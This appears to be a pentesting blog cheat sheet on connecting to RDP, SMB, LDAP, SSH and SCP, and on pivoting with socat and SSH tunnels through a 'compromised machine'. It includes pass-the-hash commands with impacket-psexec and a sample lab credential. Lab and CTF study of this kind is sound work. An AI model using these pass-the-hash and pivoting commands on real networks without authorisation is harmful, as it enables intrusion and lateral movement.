Connect

A cheat sheet on how to connect to various services

Apr 22, 2024

Windows

RDP

# xfreerdp
xfreerdp /v:<ip> /u:<username> /p:<password> +clipboard

# xfreerdp with file share
xfreerdp /u:<user> /p:<pass> /v:<ip> /drive:share,/home/kali/share/ +clipboard

# xfreerdp with domain
xfreerdp /v:10.10.235.58 /u:philip /p:Claire2008 /d:THM +clipboard

# alt
xfreerdp /v:<ip> /u:<DOMAIN>\<username> /p:<password> +clipboard

# rdesktop
rdesktop -u <username> -p <password> <ip>

SMB

# Share Access - Windows
smbclient \\\\10.10.10.10\\foldnername -U Username -P Password

# Pass-the-Hash
smbclient \\\\10.10.10.10\\foldername -U Username --pw-nt-hash 7a38310ea6f0027ee955abed1762964b

# Pass-the-Hash
impacket-psexec -hashes 00000000000000000000000000000000:7a38310ea6f0027ee955abed1762964b Administrator@10.10.10.10

LDAP

# 
ldapsearch -x -H ldap://<IP> -b "dc=domain,dc=local"

SSH

# basic connection
ssh user@<ip>

# connect with certificate
#ssh -i id_rsa user@<ip>

SCP

# pull a file
scp user@<ip>: /path/to/file.ext .

# push a file
scp file.ext user@10.10.10.10:/home/file.txt

Port Forwarding

Socat

# on compromised machine
socat TCP-LISTEN:2222,fork TCP:10.4.50.215:22

SSH Tunnel [ Local ]

# listen on all interfaces, pick a port. 
# forward to target ip:port
# using creds

# format LOCAL_IP:LOCAL_PORT:DEST_IP:DEST_PORT

ssh -N -L 0.0.0.0:4444:10.10.10.10:5555 user@20.20.20.20
ssh -N -L 0.0.0.0:4455:172.16.50.217:445 admin@10.4.50.215

# the user@20.20.20.20 is the SSH server, not the endpoint
# the 10.10.10.10 is the final endpoint, not the SSH server

# interact with endpoint: aim for client ssh ip/port
-------------------------------------------------------------------------------
# Example: SSH Tunnel, commands from kali, ssh tunneled though Foothold and pivot, landing on target.

kali -> foothold -> pivot -> target

Kali:127.0.0.1
Foothold:192.168.50.63 [ ssh client ]
Pivot:10.4.50.215 [ ssh server ]
Target:172.16.50.216

# On Foothold - 192.168.50.63:
ssh -N -L 0.0.0.0:4242:172.16.50.217:4242 admin@10.4.50.215

# The entry point in 192.168.244.63:
kali$ ./ssh_local_client -i 192.168.244.63 -p 4242

SSH Tunnel [ Dynamic ]

# same as above, but on the foothold:
ssh -N -D 0.0.0.0:9999 database_admin@10.4.50.215

# tail of /etc/proxychains4.conf
# socks5 192.168.50.63 9999

SSH Tunnel [ Remote ]

ssh -R [remote_host:remote_port]:[local_host]:[local_port] user@remote_machine

# On foothold, opens 127.0.0.1:2345 on kali, and lets you engage 10.4.50.215
ssh -N -R 127.0.0.1:2345:10.4.50.215:5432 kali@192.168.50.4

ToxSec - Bug Bounty Hunting

Discussion about this post